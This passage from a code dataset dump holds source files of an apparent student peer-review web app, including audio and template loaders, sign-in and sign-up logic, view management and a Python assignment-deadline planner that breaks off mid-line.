true);\n\txhr.responseType = 'arraybuffer';\n \n\txhr.onload = function(e) {\n\t //buffer containing sound returned by xhr\n var arrayBuffer=this.response;\n that.audioContext.decodeAudioData(arrayBuffer, function(buffer) {\n //associate the audio buffer with the sound name so can use the decoded audio later.\n\t that.audioBuffers[filename]=buffer;\n\t that.successCount++;\n\t if (that.isDone()) {\n\t downloadCallback();\n\t }\n }, function(e) {\n that.errorCount++;\n if (that.isDone()) {\n \t downloadCallback();\n }\n console.log('Error decoding file', e);\n });\n };\n\n //send the xhr request to download the sound file\n xhr.send();\n};\n\n/**\n * Plays the list of sounds sequentially.\n * param playlist - contains {name_of_sound, element name to display when the sound finishes}\n */\nAudioManager.prototype.playPlaylist = function(playList, callback) {\n var that = this; \n var sounds = [];\n var currentSound = 0;\n\n for (var [key, value] of playList) {\n console.log(key + \" = \" + value);\n sounds.push(key);\n } \n\n function next() {\n currentSound++;\n if(currentSound < sounds.length) {\n that.playSnippet(sounds[currentSound], next);\n //show picture then show sound\n var elementToDisplay = playList.get(sounds[currentSound]);\n if(elementToDisplay != undefined) {\n app.viewManager.showElement(elementToDisplay);\n }\n }\n else {\n if(callback != undefined) {\n callback();\n }\n }\n }\n\n this.playSnippet(sounds[currentSound], next);\n};\n\n/**\n * Plays sound\n * startTime and duration are optional\n */\n/**\n * Plays a sound. 
startTime & duration are optional.\n * @param filename - name of a sound and extension.\n * @param volume - sets the volume to play sound at.\n * @param startTime - from where it plays a sound.\n * @param duration - for how long it plays a sound.\n */\nAudioManager.prototype.playSound = function(filename, volume, startTime, duration, callback = null) {\n // No callback\n this.playSnippet(filename, volume, callback, startTime, duration);\n};\n\n/**\n * Plays sound if it has been loaded, otherwise does nothing.\n * @param filename - a name and an extension of the sound to play.\n * @param callback - optional: function to call when sound finishes playing.\n * @param startTime - from where it plays a sound.\n * @param duration - for how long it plays a sound.\n */\nAudioManager.prototype.playSnippet = function(filename, volume, callback, startTime, duration) {\n if (this.audioBuffers[filename] == undefined) {\n return;\n }\n\n // Retrieve the buffer we stored earlier\n var audioBuffer = this.audioBuffers[filename];\n\n // Create a buffer source - used to play once and then a new one must be made\n var source = this.audioContext.createBufferSource();\n source.buffer = audioBuffer;\n source.loop = false;\n\n // Create gain connector to control volume.\n var gainNode = this.audioContext.createGain ? this.audioContext.createGain() : this.audioContext.createGainNode();\n\n // Connect source to it.\n source.connect(gainNode);\n\n // Then connect gain to destination.\n gainNode.connect(this.audioContext.destination);\n\n // Modify volume.\n gainNode.gain.value = volume;\n \n if(callback != undefined) {\n source.onended = callback;\n }\n\n if(startTime != undefined){\n if(duration != undefined) {\n source.start(0, startTime, duration);\n }\n else{\n source.start(0, startTime);\n }\n }\n\n else {\n source.start(0); // Play immideately.\n }\n this.playingSounds[name]=source;\n};\n\n/**\n * Stops a sound.\n * @param filename - a name and an extension of the sound to stop.\n */\nAudioManager.prototype.stopPlayingSound = function(filename) {\n\tif (!this.playingSounds[name]) {\n\t\treturn;\n\t}\n\telse {\n\t\tthis.playingSounds[name].stop(0);\n\t}\n};\n\n/**\n * Plays an empty sound. This is for iOS (user needs to interact e.g. 
touch a button which\n * causes a sound to be played in order to be able to play sounds without user interaction)\n */\nAudioManager.prototype.playEmptySound = function() {\n\t// Create empty buffer\n\t// https://paulbakaus.com/tutorials/html5/web-audio-on-ios/\n\tvar buffer = this.audioContext.createBuffer(1, 1, 22050);\n\tvar source = this.audioContext.createBufferSource();\n\tsource.buffer = buffer;\n\tsource.connect(this.audioContext.destination);\n\n\t// play the file\n\tsource.start(0);\n};\n\n/**\n * Queues a sound for downloading.\n * @param soundName - name and extension of a file to load.\n */\nAudioManager.prototype.queueSound = function(soundName) {\n\tthis.downloadQueue.push(soundName);\n};\n\n/**\n * Downloads all queued sounds.\n * @param downloadCallback - a function to call once download is complete.\n */\nAudioManager.prototype.downloadAll = function(downloadCallback) {\n for (var i=0; i<this.downloadQueue.length; i++) {\n this.loadSoundFile(this.downloadQueue[i], downloadCallback);\n }\n};\n\n\n//\n// @return {boolean} - whether or not the AudioManager has\n// finished downloading all the sounds.\n/**\n * Checks if the total success count and error count is equal to total sounds to download.\n * @returns {boolean} - whether or not the AudioManager has finished downloading\n * all the sounds.\n */\nAudioManager.prototype.isDone = function() {\n console.log(\"AudioManager success count \" + this.successCount +\" / \"+ this.downloadQueue.length + ' errors: '+ this.errorCount);\n result= (this.downloadQueue.length == this.successCount + this.errorCount);\n return result;\n};\n\n\n\n"
},
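A minimal usage sketch of the preload-then-play flow (the second filename is hypothetical; `space-ship-flight.wav` is the one FeedbackView actually plays):

```javascript
// Queue sounds, download them all, then play one at full volume.
var audio = new AudioManager();
audio.queueSound("space-ship-flight.wav");
audio.queueSound("explosion.wav"); // hypothetical filename
audio.downloadAll(function () {
    // downloadAll invokes the callback once per finished file; isDone()
    // guards until the whole queue has either succeeded or failed.
    if (audio.isDone()) {
        audio.playSound("space-ship-flight.wav", 1);
    }
});
```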
{
"alpha_fraction": 0.6905278563499451,
"alphanum_fraction": 0.6905278563499451,
"avg_line_length": 23.263158798217773,
"blob_id": "abbb205347a4783f7f6bb7ed3f5792f0f292893d",
"content_id": "e3449caae66b6473fc1d832b23bbcce4f244627f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1383,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 57,
"path": "/py/user_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "from database_manager import DatabaseManager\n\nclass UserManager:\n\tdef __init__(self):\n\t\tprint(\"UserManager: __init__\")\n\t\tself.database_manager = DatabaseManager()\n\n\tdef signin(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tprint(\"in user_manager.py\")\n\t\tresult = False\n\t\tmessage_type = \"signin_failed\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tresult = self.database_manager.check_password(message_data[\"email\"],message_data[\"password\"])\n\t\texcept:\n\t\t\tmessage_type = \"signin_failed\"\n\n\t\tif result is True:\n\t\t\tmessage_type=\"signin_successful\"\n\t\t\tdata = self.database_manager.get_user_info(message_data)\n\t\t\tusers = self.database_manager.get_all_users()\n\t\t\tdata[\"users\"] = users\n\n\n\n\n\t\treturn [message_type, data]\n\n\tdef signup(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tdata = {}\n\t\tmessage_type = \"signup_successful\"\n\n\t\ttry:\n\t\t\tself.database_manager.insert_into_table(\"Users\", message_data)\n\t\t\tdata = self.database_manager.get_user_info(message_data)\n\n\t\texcept:\n\t\t\tmessage_type = \"signup_failed\"\n\n\t\tmessage = [message_type, data]\n\n\t\treturn message\n\n\tdef update_table(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tprint(message_data)\n\t\tmessage_type = \"update_table\"\n\t\tdata = message_data\n\t\t# try:\n\t\tself.database_manager.update_table(\"Users\", message_data)\n\t\t# except:\n\t\t# \tmessage_type = \"update_failed\"\n\t\tmessage = [message_type, message_data]\n\t\treturn message\n"
},
{
"alpha_fraction": 0.6274944543838501,
"alphanum_fraction": 0.6274944543838501,
"avg_line_length": 27.1875,
"blob_id": "963432ea27fc41b5c2ee5054216c3bb8f8bad7e0",
"content_id": "6ed13977dccc38912ae54ec2016119a5de373585",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/js/Assignment.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Assignment\n{\n constructor(data)\n {\n this.name = data.name;\n this.deadlineTime = data.deadline_time;\n this.deadlineDate = data.deadline_date;\n this.description = data.description;\n this.id = data.id;\n\n this.reviewTillDate = data.review_till_date;\n this.reviewTillTime = data.review_till_time;\n this.reviewersAmounts = data.reviewers_amount;\n this.status = data.status;\n }\n}\n"
},
{
"alpha_fraction": 0.6878612637519836,
"alphanum_fraction": 0.6897880434989929,
"avg_line_length": 23.13953399658203,
"blob_id": "7d0b3d52998b71595141b8e4dc56b5e038a4bc7e",
"content_id": "6d45e415dd3e7c6b9770c8fb3fe5d6e93df0e8b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 43,
"path": "/views/signin/SigninView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass SigninView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SIGNIN;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\t/**Called whenever the model changes**/\n\tonNotify (model, messageType)\n\t{\n\t\tif(messageType === net.messageHandler.types.SIGN_IN_SUCCESSFUL)\n\t\t{\n\t\t\tvar menuPanel = 0;\n\n\t\t\tif(model.role === \"student\")\n\t\t\t{\n\t\t\t\tmenuPanel = document.getElementById(\"menupanel-student\");\n\t\t\t\tdocument.getElementById(\"mps-assignments-button\").click();\n\t\t\t}\n\n\t\t\telse if (model.role === \"teacher\")\n\t\t\t{\n\t\t\t\tmenuPanel = document.getElementById(\"menupanel-teacher\");\n\t\t\t\tdocument.getElementById(\"mpt-assignments-button\").click();\n\t\t\t}\n\n\n\t\t\tmenuPanel.style.display = \"block\";\n\t\t\tvar viewNameBox = document.getElementsByClassName(\"view-name-box\")[0];\n\t\t\tviewNameBox.style.display = \"block\";\n\t\t}\n\n\t\telse if(messageType === net.messageHandler.types.SIGN_IN_FAILED)\n\t\t{\n\t\t\tthis.controller.showError(\"Details incorrect, please try again!\");\n\t\t}\n\t}\n}\n"
},
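Every view in this section relies on the same observer contract: a model's `notify(messageType)` calls `onNotify(model, messageType)` on each registered view. The base `Model` and `View` classes are not included here, so this is only a sketch of the contract they would need to satisfy:

```javascript
// Assumed base classes (the repo's own Model/View sources are not in this section).
class Model {
    constructor() { this.observers = []; }
    addObserver(observer) { this.observers.push(observer); }
    notify(messageType) {
        for (var i = 0; i < this.observers.length; i++) {
            this.observers[i].onNotify(this, messageType);
        }
    }
}

class View {
    setup() { /* grab DOM nodes, register as observer, bind listeners */ }
    show() { document.getElementById(this.title).style.display = "block"; }
    hide() { document.getElementById(this.title).style.display = "none"; }
    onNotify(model, messageType) { /* overridden by concrete views */ }
}
```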
{
"alpha_fraction": 0.6356993913650513,
"alphanum_fraction": 0.6377870440483093,
"avg_line_length": 18.5510196685791,
"blob_id": "13eaffdb9c7852b00d0aeca65c2addd2d23c427b",
"content_id": "22b3a7943bf894968db226c893c099a0c4b1c16e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1916,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 98,
"path": "/js/ModalContentManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Loads HTML templates, makes them available to the app views**/\nclass ModalContentManager\n{\n\tconstructor()\n\t{\n\t\tthis.cache={};\n\t\tthis.successCount = 0;\n\t \tthis.errorCount = 0;\n\n\t \tthis.modals = [\n\t \t\t\"add-assignment\",\n\t\t\t\"submit-assignment\",\n\t\t\t\"select-review-student\",\n\t\t\t\"rocket-game\"\n\t\t];\n\t}\n\n\n\n\tdownloadAll (downloadCallback)\n\t{\n\t for (var i=0; i<this.modals.length; i++)\n\t {\n\t \t\tthis.downloadModalContent(this.modals[i], downloadCallback);\n\t }\n\t}\n\n\t/**Download a single template and store it**/\n\tdownloadModalContent (contentName, downloadCallback)\n\t{\n\t\tvar that = this;\n\t\tvar url = window.location.href+\"/modals/\"+contentName+\".html\";\n\t\tvar xhr = new XMLHttpRequest();\n\n\t\tconsole.log(\"url: \" + url);\n\n\t\txhr.onload = function()\n\t\t{\n\t\t\tvar el = document.createElement( 'html' );\n\t\t\tel.innerHTML = xhr.responseText;\n\n\t\t\t//get body\n\t\t\tel = el.getElementsByTagName(\"body\")[0];\n\t\t\tconsole.log(\"el: \" + el);\n\n\t\t\t//store the template\n\t\t\tthat.cache[contentName] = el;\n\t\t\tthat.successCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n\t\t\t\tdownloadCallback();\n\t\t\t}\n\t\t};\n\n\t\txhr.onerror = function()\n\t\t{\n\t\t\tthat.errorCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n \t\tdownloadCallback();\n \t\t}\n\t\t};\n\n\t\txhr.open(\"GET\", url);\n\t\txhr.send();\n\t}\n\n\t/**\n\t* Checks if the total success count and error count is equal\n\t* to total templates to download.\n\t* @return {boolean} - whether or not the TemplateManager has\n\t* finished downloading all the HTML templates.\n\t**/\n\tisDone ()\n\t{\n\t console.log(\"ModalContentManager success count \" + this.successCount +\" / \"+ this.modals.length + ' errors: '+ this.errorCount);\n\t var result = (this.modals.length === this.successCount + this.errorCount);\n\n\t return result;\n\t}\n\n\tgetModalContent(name)\n\t{\n\n\t\tvar modalContent = this.cache[name];\n\n\t\tif(modalContent === undefined)\n\t\t{\n\t\t\tconsole.error(name, \"modal content is not defined\");\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn modalContent.innerHTML;\n\t\t}\n\t}\n}\n"
},
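Consumers use it exactly the way AssignmentsTeacherController below does; a condensed sketch, assuming `app.uiFactory.createModal` returns `{modal, submit, closes}` as the views expect:

```javascript
// Fetch a preloaded modal body and mount it on the page.
var body = app.modalContentManager.getModalContent("add-assignment");
var modalData = app.uiFactory.createModal("add-assignment", "Add Assignment", body, true);
document.body.appendChild(modalData.modal);
modalData.modal.style.display = "block";
```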
{
"alpha_fraction": 0.6788856387138367,
"alphanum_fraction": 0.6788856387138367,
"avg_line_length": 25.571428298950195,
"blob_id": "ae5ee483b33081205ae02ed1ed9ae793ed2cc97e",
"content_id": "3d87802cc0075844c972756d9098518873ae4afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2046,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 77,
"path": "/views/signup/SignupController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Controller for sign up**/\nclass SignupController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\n\t\tvar signupButton = document.getElementById(\"signup-button\");\n\t\tvar email = document.getElementById(\"signup-email\");\n\t\tvar name = document.getElementById(\"signup-name\");\n var surname = document.getElementById(\"signup-surname\");\n\t\tvar noun = document.getElementById(\"signup-noun\");\n\t\tvar password = document.getElementById(\"signup-password\");\n\t\tvar passwordConfirm = document.getElementById(\"signup-confirm-password\");\n\n\t\tsignupButton.addEventListener(\"click\", function(){that.signup()} );\n\n\t}\n\n\tsignup(e)\n\t{\n\t\tvar email = document.getElementById(\"signup-email\").value;\n\t\tvar teamName = \"none\";\n\t\tvar name = document.getElementById(\"signup-name\").value;\n \tvar surname = document.getElementById(\"signup-surname\").value;\n\t\tvar noun = document.getElementById(\"signup-noun\").value;\n\t\tvar password = document.getElementById(\"signup-password\").value;\n\t\tvar passwordConfirm = document.getElementById(\"signup-confirm-password\").value;\n\n\t\tif (email !== \"\" && teamName !== \"\" && name !== \"\" && surname !== \"\" && noun !== \"\" && password !== \"\" && passwordConfirm !== \"\")\n\t\t{\n\t\t\tif (password === passwordConfirm)\n\t\t\t{\n\t\t\t\tthis.model.signup(email, teamName, name, surname, noun, password);\n\t\t\t\tthis.cleanSignup();\n\t\t\t}\n\n\t\t\telse\n\t\t\t{\n\t\t\t\tthis.showError(\"Passwords do not match!\");\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tthis.showError(\"You did not fill out everything!\");\n\t\t}\n\n\n\n\t}\n\n\n\tcleanSignup()\n\t{\n\t\t// Clean values\n\t\tdocument.getElementById(\"signup-email\").value = \"\";\n\t\tdocument.getElementById(\"signup-team-name\").value = \"\";\n\t\tdocument.getElementById(\"signup-name\").value = \"\";\n\t\tdocument.getElementById(\"signup-surname\").value = \"\";\n\t\tdocument.getElementById(\"signup-noun\").value = \"\";\n\t\tdocument.getElementById(\"signup-password\").value = \"\";\n\t\tdocument.getElementById(\"signup-confirm-password\").value = \"\";\n\t}\n\n\tshowError(errMessage)\n\t{\n\t\tdocument.getElementById(\"signup-error\").innerHTML = errMessage;\n\t}\n\n\n}\n"
},
{
"alpha_fraction": 0.7302284836769104,
"alphanum_fraction": 0.7334504723548889,
"avg_line_length": 30.03636360168457,
"blob_id": "1b7fddb4517014dd491ded389828e3eb23e4d0a3",
"content_id": "c91ee29a3bd2a03fa19fa4895d1a8e26b111cd73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3414,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 110,
"path": "/views/assignments-teacher/AssignmentsTeacherController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class AssignmentsTeacherController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar controller = this;\n\t\tconsole.log(this.model);\n\n\t\tvar addBtn = document.getElementById(\"add-assignment-button\");\n\n\n\t\taddBtn.addEventListener(\"click\", function()\n\t\t{\n\t\t\tcontroller.createAddAssignmentModal();\n\t\t});\n\n\t\t// var name = document.getElementById(\"assignment-name\");\n\t\t// var deadline = document.getElementById(\"assignment-submission-deadline\");\n\t\t// var reviewDeadline = document.getElementById(\"assignment-review-deadline\");\n\t\t// var description = document.getElementById(\"assignment-description\");\n\t\t// var reviewersAmount = document.getElementById(\"assignment-total-reviewers\");\n\t\t//\n\t\t// name.addEventListener(\"click\", function(){track(\"assignment-name\")});\n\t\t// deadline.addEventListener(\"click\", function(){track(\"assignment-submission-deadline\")});\n\t\t// reviewDeadline.addEventListener(\"click\", function(){track(\"assignment-review-deadline\")});\n\t\t// description.addEventListener(\"click\", function(){track(\"assignment-description\")});\n\t\t// reviewersAmount.addEventListener(\"click\", function(){track(\"assignment-total-reviewers\")});\n\t}\n\n\n\tcreateAddAssignmentModal()\n\t{\n\n\t\tvar controller = this;\n\n\t\t// Init Modal\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"add-assignment\");\n\t\tvar modalData = app.uiFactory.createModal(\"add-assignment\", \"Add Assignment\", modalBody, true);\n\t\tdocument.body.appendChild(modalData.modal);\n\t\tmodalData.modal.style.display = \"block\";\n\n\t\t//Set minimum datetime and current datetime to now.\n\t\tvar today = new Date().toISOString();\n\t\ttoday = today.substr(0, today.lastIndexOf(\".\"));\n\n\t\tdocument.getElementById(\"assignment-submission-deadline\").min = today;\n\t\tdocument.getElementById(\"assignment-submission-deadline\").value = today;\n\n\t\tdocument.getElementById(\"assignment-review-deadline\").min = today;\n\t\tdocument.getElementById(\"assignment-review-deadline\").value = today;\n\n\n\t\tvar submitBtn = modalData.submit;\n\t\tsubmitBtn.addEventListener(\"click\", function ()\n\t\t{\n\t\t\tcontroller.createAssignment();\n\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\tparentNode.removeChild(modalData.modal);\n });\n\n\n\t}\n\n\tcreateAssignment()\n\t{\n\n\t\tvar name = document.getElementById(\"assignment-name\").value;\n\t\tvar deadlineDate = document.getElementById(\"assignment-submission-deadline\").value.split('T')[0];\n\t\tvar deadlineTime = document.getElementById(\"assignment-submission-deadline\").value.split('T')[1];\n\t\tvar reviewTillDate = document.getElementById(\"assignment-review-deadline\").value.split('T')[0];\n\t\tvar reviewTillTime = document.getElementById(\"assignment-review-deadline\").value.split('T')[1];\n\n\t\tvar totalColons = deadlineTime.split(\":\").length-1;\n\t\t// Remove seconds\n\t\tif (totalColons === 2) {\n\t\t\tdeadlineTime = deadlineTime.substring(0, deadlineTime.lastIndexOf(\":\"));\n\t\t}\n\n\n\t\ttotalColons = reviewTillTime.split(\":\").length-1;\n\t\t// Remove seconds\n\t\tif (totalColons === 2) {\n\t\t\treviewTillTime = reviewTillTime.substring(0, reviewTillTime.lastIndexOf(\":\"));\n\t\t}\n\n\n\t\tvar description = document.getElementById(\"assignment-description\").value;\n\t\tvar reviewersAmount = document.getElementById(\"assignment-total-reviewers\").value;\n\n\n\t\tthis.model.createAssignment(name, deadlineTime, 
deadlineDate,reviewTillTime, reviewTillDate, description, reviewersAmount);\n\t}\n\n\tdeleteAssignment(id)\n\t{\n\t\tthis.model.deleteAssignment(id);\n\t}\n\n\n\n\tupdate()\n\t{\n\n\t}\n}\n"
},
{
"alpha_fraction": 0.6533433198928833,
"alphanum_fraction": 0.6548374891281128,
"avg_line_length": 21.123966217041016,
"blob_id": "4530ea166046d62379e68b7da0f960c67e391c09",
"content_id": "e92bf9ffb10083db431cf7e721e5e0f24d48311d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2677,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 121,
"path": "/js/TemplateManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Loads HTML templates, makes them available to the app views**/\nclass TemplateManager\n{\n\tconstructor()\n\t{\n\t\tthis.downloadQueue = [];\n\t\tthis.cache={};\n\t\tthis.successCount = 0;\n\t \tthis.errorCount = 0;\n\t}\n\n\t/**Queue a template for downloading**/\n\tqueueTemplate (templateName)\n\t{\n\t\tthis.downloadQueue.push(templateName);\n\t}\n\n\t/**\n\t* Downloads all templates\n\t* @param {function} downloadCallback\n\t* function called when all the templates are downloaded\n\t**/\n\tdownloadAll (downloadCallback)\n\t{\n\t for (var i=0; i<this.downloadQueue.length; i++)\n\t {\n\t \t\tthis.downloadTemplate(this.downloadQueue[i], downloadCallback);\n\t }\n\t}\n\n\t/**Download a single template and store it**/\n\tdownloadTemplate (templateName, downloadCallback)\n\t{\n\t\tvar that = this;\n\t\tvar url = window.location.href+\"/views/\"+templateName+\"/\"+templateName+\".html\";\n\t\tvar xhr = new XMLHttpRequest();\n\n\t\tconsole.log(\"url: \" + url);\n\n\t\txhr.onload = function()\n\t\t{\n\t\t\tvar el = document.createElement( 'html' );\n\t\t\tel.innerHTML = xhr.responseText;\n\n\t\t\t//get body\n\t\t\tel = el.getElementsByTagName(\"body\")[0];\n\t\t\tconsole.log(\"el: \" + el);\n\n\t\t\t//store the template\n\t\t\tthat.cache[templateName] = el;\n\t\t\tthat.successCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n\t\t\t\tdownloadCallback();\n\t\t\t}\n\t\t};\n\n\t\txhr.onerror = function()\n\t\t{\n\t\t\tthat.errorCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n \t\tdownloadCallback();\n \t\t}\n\t\t};\n\n\t\txhr.open(\"GET\", url);\n\t\txhr.send();\n\t}\n\n\t/**\n\t* Checks if the total success count and error count is equal\n\t* to total templates to download.\n\t* @return {boolean} - whether or not the TemplateManager has\n\t* finished downloading all the HTML templates.\n\t**/\n\tisDone ()\n\t{\n\t console.log(\"TemplateManager success count \" + this.successCount +\" / \"+ this.downloadQueue.length + ' errors: '+ this.errorCount);\n\t var result= (this.downloadQueue.length == this.successCount + this.errorCount);\n\n\t return result;\n\t}\n\n\t/**\n\t * Processes template e.g. corrects the path to the image resources.\n\t * @param {Object} - the HTML template as DOM\n\t * @return {Object} - the processed HTML template as DOM\n\t **/\n\tprocessTemplate (template)\n\t{\n\n\t}\n\n\tloadFromCache()\n\t{\n\t\tfor(var index in this.cache)\n\t\t{\n\t\t\t//add root element for this view\n\t\t\tvar divNode = document.createElement(\"div\");\n\t\t\tdivNode.id = index;\n\t\t\tdocument.body.appendChild(divNode);\n\t\t\tvar view = this.cache[index];\n\n\t\t\tif(index == undefined)\n\t\t\t{\n\t\t\t\tconsole.error(\"Trying to use a view that doesn't exist. Check the this.title in your views exist in ViewManager.VIEW\");\n\t\t\t}\n\t\t\telse if(view == undefined)\n\t\t\t{\n\t\t\t\tconsole.error(this.title +\" view is not defined\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tdivNode.innerHTML = this.cache[index].innerHTML;\n\t\t\t}\n\t\t}\n\t}\n}\n"
},
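The intended boot sequence is queue, download, inject; a sketch using view names from ViewManager below (the real bootstrap code is outside this section):

```javascript
// Queue the view templates, download them, then inject each cached <body>
// into the page as <div id="viewname">, ready for ViewManager to show/hide.
var templates = new TemplateManager();
templates.queueTemplate("signin");
templates.queueTemplate("signup");
templates.downloadAll(function () {
    if (templates.isDone()) {
        templates.loadFromCache();
    }
});
```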
{
"alpha_fraction": 0.646661639213562,
"alphanum_fraction": 0.6474118232727051,
"avg_line_length": 19.507692337036133,
"blob_id": "0a9c79c4ec70184cb84f7bac66a4cfe1e58d6bc4",
"content_id": "82d584fdd2dc2272b43e467ed882cf40224589ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1333,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 65,
"path": "/js/ViewManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Keeps track of views, add views, switch to a given view.\n* @constructor**/\nclass ViewManager\n{\n\tconstructor()\n\t{\n\t\tthis.views=[];\n\t\tthis.currentView = undefined;\n\n\t\tthis.VIEW = {\n\t\t\tSIGNIN: \"signin\",\n\t\t\tSIGNUP: \"signup\",\n\t\t\tPROFILE: \"profile\",\n\t\t\tASSIGNMENTS_TEACHER: \"assignments-teacher\",\n\t\t\tASSIGNMENTS_STUDENT: \"assignments-student\",\n\t\t\tFEEDBACK: \"feedback\",\n\t\t\tPERFORM_REVIEW_STUDENT: \"perform-review-student\",\n\t\t\tSEE_SUBMISSIONS_STUDENT: \"see-submissions-student\",\n\t\t\tSEE_SUBMISSIONS_TEACHER: \"see-submissions-teacher\",\n\t\t\tSEE_STANDARDS_STUDENT: \"see-standards-student\",\n\t\t\tSEE_STANDARDS_TEACHER: \"see-standards-teacher\",\n\t\t\tCODE_VIEW:\"code-view\"\n\t\t}\n\t}\n\n\t/**@param {View} view**/\n\taddView (view)\n\t{\n\t\tthis.views.push(view);\n\t}\n\n\t/**@param {string} title**/\n\tgoToView (title)\n\t{\n\t\tvar viewFound=false;\n\t\tvar i=0;\n\n\t\twhile(i < this.views.length && !viewFound)\n\t\t{\n\t\t\tif(this.views[i].title===title)\n\t\t\t{\n\t\t\t\tviewFound=true;\n\t\t\t\tthis.nextView = this.views[i];\n\t\t\t}\n\t\t\ti++;\n\t\t}\n\n\t\tif(viewFound)\n\t\t{\n\t\t\tif(this.currentView!==undefined)\n\t\t\t{\n\t\t\t\tconsole.log(\"Change view from:\", this.currentView.title);\n\t\t\t\tthis.currentView.hide();\n\t\t\t}\n\n\t\t\tthis.currentView = this.nextView;\n\t\t\tconsole.log(\"Change view to:\", this.currentView.title);\n\t\t\tthis.currentView.show();\n\t\t}\n\t\telse\n\t\t{\n\t\t\tconsole.log(\"View not found:\", title);\n\t\t}\n\t}\n}\n"
},
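Navigation then reduces to registering views once and switching by title; a sketch (a `SigninController` is assumed to exist alongside the `SignupController` shown earlier):

```javascript
// Register the views, then navigate: goToView() hides the current view's
// root element and shows the requested one.
var viewManager = new ViewManager();
viewManager.addView(new SigninView(new SigninController(app.user))); // controller assumed
viewManager.goToView(viewManager.VIEW.SIGNIN);
```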
{
"alpha_fraction": 0.529978334903717,
"alphanum_fraction": 0.5335901975631714,
"avg_line_length": 32.49193572998047,
"blob_id": "9ff76b89d2547a95b478869be6cabecf0909e199",
"content_id": "7101432be8d54143d9fc219e0f10927872ae798b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4153,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 124,
"path": "/py/planner.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import datetime\n\n#from user_manager import UserManager\nfrom assignments_manager import AssignmentsManager\n#from email_system import EmailSystem\nfrom database_manager import DatabaseManager\n\n\nclass CheckAssignmentStage():\n def __init__(self):\n self.assignments_manager = AssignmentsManager()\n self.database_manager = DatabaseManager()\n\n def update(self):\n #print(\"##########################################\")\n #print(\"DAEMON IS UPDATED\")\n #print(\"##########################################\")\n\n update_clients = False\n\n #Thsi method returns a message pack (type, data). We need data\n assignments = self.assignments_manager.get_assignments()[1]\n for assignment in assignments:\n status = assignment[\"status\"]\n old_status = status\n deadline_string = assignment[\"deadline_date\"] + \"T\" + assignment[\"deadline_time\"]\n review_till_string = assignment[\"review_till_date\"] + \"T\" + assignment[\"review_till_time\"]\n\n deadline_time = datetime.datetime.strptime(deadline_string, '%Y-%m-%dT%H:%M')\n review_till_time = datetime.datetime.strptime(review_till_string, '%Y-%m-%dT%H:%M')\n\n\n if status == \"normal\":\n time_remaining = deadline_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=1):\n status = \"submission_soon\"\n #SEND EMAIL\n pass\n\n elif status == \"review\":\n time_remaining = review_till_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=1):\n status = \"review_end_soon\"\n # SEND EMAIL\n pass\n\n elif status == \"submission_soon\":\n time_remaining = deadline_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=0):\n status = \"review\"\n self.reviewer_assigning(assignment)\n update_clients = True\n # SEND EMAIL\n\n pass\n\n elif status == \"review_end_soon\":\n time_remaining = review_till_time - datetime.datetime.now()\n if time_remaining < datetime.timedelta(hours=0):\n status = \"completed\"\n update_clients = True\n\n\n # SEND EMAIL\n pass\n\n if old_status != status:\n try:\n 